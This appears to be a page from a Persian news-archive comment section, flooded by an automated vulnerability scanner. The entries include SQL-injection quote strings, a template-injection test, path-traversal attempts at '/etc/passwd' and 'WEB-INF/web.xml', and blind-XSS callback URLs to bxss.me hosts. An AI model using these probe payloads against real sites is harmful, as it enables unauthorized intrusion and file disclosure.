qiblaqge چهارشنبه, 14 شهریور,1397 03:13
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:14
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:15
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:17
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:18
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:19
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg چهارشنبه, 14 شهریور,1397 03:20
1
testasp.vulnweb.com چهارشنبه, 14 شهریور,1397 03:21
1
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg چهارشنبه, 14 شهریور,1397 03:22
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:23
1
testasp.vulnweb.com چهارشنبه, 14 شهریور,1397 03:23
1
sujupaoo چهارشنبه, 14 شهریور,1397 03:24
1
qodvjpbt چهارشنبه, 14 شهریور,1397 03:25
http://hitTRUYLiYRP0.bxss.me/
qodvjpbt چهارشنبه, 14 شهریور,1397 03:25
http://hitGhqofPKIPo.bxss.me/
qodvjpbt چهارشنبه, 14 شهریور,1397 03:25
http://hityvpGUuSdgk.bxss.me/
qodvjpbt چهارشنبه, 14 شهریور,1397 03:25
http://hit5kgfiHDGg5.bxss.me/
qodvjpbt چهارشنبه, 14 شهریور,1397 03:25
http://hit2LRMVkdAFC.bxss.me/
qodvjpbt چهارشنبه, 14 شهریور,1397 03:25
http://hit8D0X4VVjT5.bxss.me/
qodvjpbt چهارشنبه, 14 شهریور,1397 03:25
http://hitoBHucHsyvM.bxss.me/
nsgbsrai چهارشنبه, 14 شهریور,1397 03:25
1
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
1'"
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
\
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
1����%2527%2522
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
@@SX4gn
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
JyI=
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
�'�"
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
�''�""
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
@@b0jxp
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
@@g0xjl
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
@@85ND3
porsmonn چهارشنبه, 14 شهریور,1397 03:26
1
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
@@9xEse
porsmonn چهارشنبه, 14 شهریور,1397 03:26
/www.vulnweb.com
nsgbsrai چهارشنبه, 14 شهریور,1397 03:26
@@ew9wt
nsgbsrai چهارشنبه, 14 شهریور,1397 03:27
@@aEh5a
nsgbsrai چهارشنبه, 14 شهریور,1397 03:28
1
nsgbsrai چهارشنبه, 14 شهریور,1397 03:29
1
porsmonn چهارشنبه, 14 شهریور,1397 03:30
1
nsgbsrai چهارشنبه, 14 شهریور,1397 03:31
1
ldasexcf چهارشنبه, 14 شهریور,1397 03:31
1'"()&%
ldasexcf چهارشنبه, 14 شهریور,1397 03:31
'"()&%
ldasexcf چهارشنبه, 14 شهریور,1397 03:31
19657513
ldasexcf چهارشنبه, 14 شهریور,1397 03:32
acu2185%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2185
nsgbsrai چهارشنبه, 14 شهریور,1397 03:32
1
ldasexcf چهارشنبه, 14 شهریور,1397 03:32
acux7157%C0%BEz1%C0%BCz2a%90bcxuca7157
ldasexcf چهارشنبه, 14 شهریور,1397 03:32
CWS%07%0e000x%9c=%8d1N%c3%40%10E%df%ae%8d%bdI%08)%d3%40%1d%a0%a2%05%09%11%89HiP"%05D%8bF%8e%0bG%26%1b%d9%8e%117%a0%a2%dc%82%8a%1br%04X;!S%8c%fe%cc%9b%f9%ff%aa%cb7Jq%af%7f%ed%f2.%f8%01>%9e%18p%c9c%9al%8b%aczG%f2%dc%beM%ec%abdkj%1e%ac%2c%9f%a5(%b1%eb%89T%c2Jj)%93"%dbT7%24%9c%8fH%cbD6)%a3%0bx)%ac%ad%d8%92%fb%1f%5c%07C%ac%7c%80Q%a7Nc%f4b%e8%fa%98%20b_%26%1c%9f5%20h%f1%d1g%0f%14%c1%0a[s%8d%8b0Q%a8L<%9b6%d4L%bd_%a8w%7e%9d]%17%f3/[%dcm{%ef%cb%ef%e6%8d:n-%fb%b3%c3%dd.%e3d1d%ec%c7%3f6%cd0%09]
ldasexcf چهارشنبه, 14 شهریور,1397 03:32
{{10000028*9999798}}
ldasexcf چهارشنبه, 14 شهریور,1397 03:32
1
ldasexcf چهارشنبه, 14 شهریور,1397 03:32
13BX5W[!+!]
nsgbsrai چهارشنبه, 14 شهریور,1397 03:33
1
nsgbsrai چهارشنبه, 14 شهریور,1397 03:34
1
nsgbsrai چهارشنبه, 14 شهریور,1397 03:35
1
nsgbsrai چهارشنبه, 14 شهریور,1397 03:36
1
../../../../../../../../../../etc/passwd چهارشنبه, 14 شهریور,1397 03:39
1
/WEB-INF/web.xml چهارشنبه, 14 شهریور,1397 03:40
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:41
1
pcmsukps چهارشنبه, 14 شهریور,1397 03:42
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:44
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:45
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:46
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:47
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:48
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:49
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:50
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:51
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:52
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:53
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:54
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:55
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:57
1
xsmavkeo چهارشنبه, 14 شهریور,1397 03:58
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:01
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:03
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:04
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:04
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:05
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:07
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:08
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:09
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:10
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:11
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:12
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:14
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:15
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:16
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:17
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:18
1
xsmavkeo چهارشنبه, 14 شهریور,1397 04:19
1

آرشیو اخبار